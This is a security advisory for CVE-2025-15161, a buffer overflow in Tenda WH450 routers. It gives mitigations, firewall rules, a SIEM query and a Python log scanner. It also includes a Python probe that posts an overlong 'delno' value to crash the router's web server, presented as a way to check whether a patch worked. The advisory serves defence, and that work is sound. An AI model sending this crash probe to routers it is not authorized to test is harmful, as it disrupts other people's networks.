CVE-2025-15161
📋 TL;DR
A stack-based buffer overflow vulnerability in Tenda WH450 routers allows remote attackers to execute arbitrary code by manipulating the 'delno' parameter in the /goform/PPTPUserSetting endpoint. This affects Tenda WH450 routers running firmware version 1.0.0.18. Attackers can exploit this without authentication to potentially take full control of affected devices.
💻 Affected Systems
- Tenda WH450
📦 What is this software?
The Tenda WH450 is a consumer router from Tenda (tenda.com.cn). The vulnerable code lives in the router's embedded web management interface: the /goform/ handlers process form submissions from the admin UI, and PPTPUserSetting is the handler for PPTP user settings, where the delno parameter is parsed into a fixed-size stack buffer.
⚠️ Risk & Real-World Impact
Worst Case
Remote code execution leading to complete device compromise, credential theft, lateral movement into internal networks, and persistent backdoor installation.
Likely Case
Remote code execution allowing attackers to modify router settings, intercept network traffic, or use the device as a pivot point for further attacks.
If Mitigated
Crash of the router's web server (denial of service) or limited information disclosure, when the management interface is reachable only from trusted hosts or an exploit attempt fails to achieve code execution.
🎯 Exploit Status
Public proof-of-concept available on GitHub. Remote exploitation requires no authentication. Simple HTTP request manipulation.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Unknown
Vendor Advisory: https://www.tenda.com.cn/
Restart Required: Yes
Instructions:
1. Check Tenda website for firmware updates
2. Download latest firmware for WH450
3. Log into router admin interface
4. Navigate to System Tools > Firmware Upgrade
5. Upload and apply new firmware
6. Reboot router after update
🔧 Temporary Workarounds
Disable Remote Management
Prevent access to the router web interface from the WAN side. The vulnerable endpoint is part of that interface, so closing it removes the remote attack path (LAN clients can still reach it).
Login to router admin > System Tools > Remote Management > Disable
Network Segmentation
Isolate the router management interface to a trusted network. The rules below filter the INPUT chain, which assumes a shell on the device itself; stock Tenda firmware provides none, so in practice apply the equivalent on a Linux firewall or gateway in front of the router (FORWARD chain, matching the router address with -d). Rules are appended in order, so the ACCEPT rules must come before the DROP rules:
iptables -A INPUT -p tcp --dport 80 -s TRUSTED_NET -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -s TRUSTED_NET -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP
iptables -A INPUT -p tcp --dport 443 -j DROP
🧯 If You Can't Patch
- Replace affected Tenda WH450 routers with different models or brands
- Implement strict network access controls to limit exposure of router management interface
🔍 How to Verify
Check if Vulnerable:
Read the firmware version in the admin interface under System Status or System Tools > Firmware Upgrade; version 1.0.0.18 is affected.
Check Version:
curl -s http://router-ip/ | grep -i 'firmware'
This only works if the login page itself prints the version; on most builds the version is shown after login, so fall back to the web interface.
Verify Fix Applied:
Confirm the firmware version is no longer 1.0.0.18, then check that /goform/PPTPUserSetting handles an overlong delno value without the web server dropping the connection. Do this only on devices you own or are authorized to test: on unpatched firmware the request is expected to crash the web server.
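The verification described above, as an added example that is not code from the advisory or from Tenda. It checks the reported firmware version against the affected one, takes a baseline GET so a later failure can be attributed to the probe rather than the network, then sends an overlong delno and classifies the outcome. It assumes the admin UI is reachable over plain HTTP, that the handler reads application/x-www-form-urlencoded bodies, and that a crash shows up as a reset or timed-out connection; the 600-byte delno length is a guess, not a value from the public PoC.

```python
"""Check whether a Tenda WH450 is on the affected firmware and whether its
/goform/PPTPUserSetting handler survives an overlong 'delno' value.

Added example, not code from the advisory or from Tenda. Assumptions (none
stated by the advisory): plain HTTP on the admin UI, form-urlencoded POST
bodies, and a crash visible as a reset or timed-out TCP connection. The
600-byte delno length is a guess.

WARNING: on an unpatched router this POST is expected to crash the web
server and may reboot the device. Run it only on hardware you own or are
authorized to test.
"""
import urllib.error
import urllib.parse
import urllib.request

AFFECTED_VERSION = "1.0.0.18"
ENDPOINT = "/goform/PPTPUserSetting"


def version_tuple(version: str) -> tuple:
    """'1.0.0.18' -> (1, 0, 0, 18) so versions compare numerically."""
    return tuple(int(part) for part in version.strip().split("."))


def is_affected_version(version: str) -> bool:
    """True when the reported firmware is exactly the version the advisory names."""
    return version_tuple(version) == version_tuple(AFFECTED_VERSION)


def build_probe(base_url: str, delno_len: int = 600) -> tuple:
    """Return (url, body) for the probe; delno_len is an assumed overflow length."""
    body = urllib.parse.urlencode({"delno": "A" * delno_len}).encode("ascii")
    return base_url.rstrip("/") + ENDPOINT, body


def reachable(base_url: str, timeout: float = 5.0) -> bool:
    """Baseline GET: any HTTP status means the router's web server is alive."""
    req = urllib.request.Request(base_url.rstrip("/") + "/", method="GET")
    try:
        with urllib.request.urlopen(req, timeout=timeout):
            return True
    except urllib.error.HTTPError:
        return True
    except (urllib.error.URLError, OSError):
        return False


def run_probe(base_url: str, delno_len: int = 600, timeout: float = 5.0) -> str:
    """Send the overlong delno; returns unreachable, responded:<status> or connection_lost."""
    if not reachable(base_url, timeout):
        return "unreachable"
    url, body = build_probe(base_url, delno_len)
    req = urllib.request.Request(url, data=body, method="POST")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return f"responded:{resp.status}"
    except urllib.error.HTTPError as exc:
        return f"responded:{exc.code}"   # a 4xx/5xx still means httpd is alive
    except (urllib.error.URLError, OSError):
        return "connection_lost"         # reset or timeout right after the probe


def interpret(result: str) -> str:
    """Turn a run_probe() result into the verdict to record."""
    if result == "unreachable":
        return "router web UI not reachable before the probe; nothing tested"
    if result.startswith("responded:"):
        return ("httpd survived the overlong delno; not proof of a fix on its own, "
                "confirm the firmware version is no longer " + AFFECTED_VERSION)
    return ("connection reset or timed out right after the overlong delno: httpd "
            "most likely crashed, device is probably still vulnerable")


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "http://192.168.0.1"
    print(interpret(run_probe(target)))
```

A surviving web server is a weaker signal than the version check: the handler may simply truncate at a different length than the one guessed here, so record both results.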
📡 Detection & Monitoring
Log Indicators:
- HTTP POST requests to /goform/PPTPUserSetting with an unusually long delno parameter (stock firmware does not log request bodies, so this needs a proxy, IDS or packet capture in front of the router)
- Router crash/reboot logs and unexplained uptime resets
- Unusual process execution in router logs
Network Indicators:
- HTTP traffic to the router IP on port 80/443 containing 'delno=' followed by a long string, especially from the WAN side
- Sudden changes in router configuration
SIEM Query:
source="router_logs" AND (uri="/goform/PPTPUserSetting" AND (param="delno" AND length>100))
The query is pseudo-syntax: map source, uri, param and length to the field names of the log source you actually have. The threshold of 100 is a heuristic; legitimate delno values are short.
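The detection logic above, run over sample traffic, as an added example that is not part of the advisory. Because the router does not log bodies, it assumes a sensor in front of the router (reverse proxy, IDS http log or pcap export) that records timestamp, source IP, method, URI and body, tab-separated; that format and the sample lines are constructed for this example. It checks both the query string and the POST body, since the page's indicator only names POST but a GET with delno in the URL reaches the same handler.

```python
"""Flag overlong 'delno' values sent to /goform/PPTPUserSetting.

Added example, not part of the advisory. Input is assumed to come from a
sensor in front of the router that logs "<ts>\t<src>\t<method>\t<uri>\t<body>";
the format and SAMPLE_LOG below are constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

ENDPOINT = "/goform/PPTPUserSetting"
MAX_DELNO_LEN = 100    # assumed threshold; a legitimate delno is a short index

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\t(?P<src>\S+)\t(?P<method>[A-Z]+)\t(?P<uri>\S+)\t(?P<body>.*)$"
)

# Constructed sample traffic: one normal delete, one overflow attempt in the
# POST body, one in the query string, and one unrelated request.
SAMPLE_LOG = "\n".join([
    "2025-01-01T10:00:00Z\t192.168.0.20\tPOST\t/goform/PPTPUserSetting\tdelno=3",
    "2025-01-01T10:00:05Z\t203.0.113.5\tPOST\t/goform/PPTPUserSetting\tdelno=" + "A" * 300,
    "2025-01-01T10:00:09Z\t198.51.100.7\tGET\t/goform/PPTPUserSetting?delno=" + "B" * 150 + "\t",
    "2025-01-01T10:00:12Z\t192.168.0.21\tPOST\t/goform/WifiBasicSet\tssid=home",
])


def delno_values(uri: str, body: str) -> list:
    """All delno values from the query string and the form body."""
    values = []
    for encoded in (urlsplit(uri).query, body):
        values.extend(parse_qs(encoded, keep_blank_values=True).get("delno", []))
    return values


def analyze_line(line: str):
    """Return an alert dict for a request with an overlong delno, else None."""
    m = LINE_RE.match(line)
    if not m or urlsplit(m["uri"]).path != ENDPOINT:
        return None
    for value in delno_values(m["uri"], m["body"]):
        if len(value) > MAX_DELNO_LEN:
            return {
                "ts": m["ts"], "src": m["src"], "method": m["method"],
                "delno_len": len(value), "numeric": value.isdigit(),
            }
    return None


def scan(log_text: str) -> list:
    """Run analyze_line over every line and collect the alerts in order."""
    alerts = []
    for line in log_text.splitlines():
        alert = analyze_line(line)
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f"{a['ts']} {a['src']} {a['method']} delno_len={a['delno_len']} numeric={a['numeric']}")
```

The `numeric` flag is context for the analyst: a long value that is also non-numeric is almost certainly not a legitimate index, whereas a long numeric value can still be a client bug worth a lower severity.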